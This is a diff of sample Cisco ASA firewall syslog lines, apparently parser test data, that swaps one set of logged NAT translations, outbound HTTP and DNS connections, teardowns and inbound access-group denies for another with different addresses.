-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
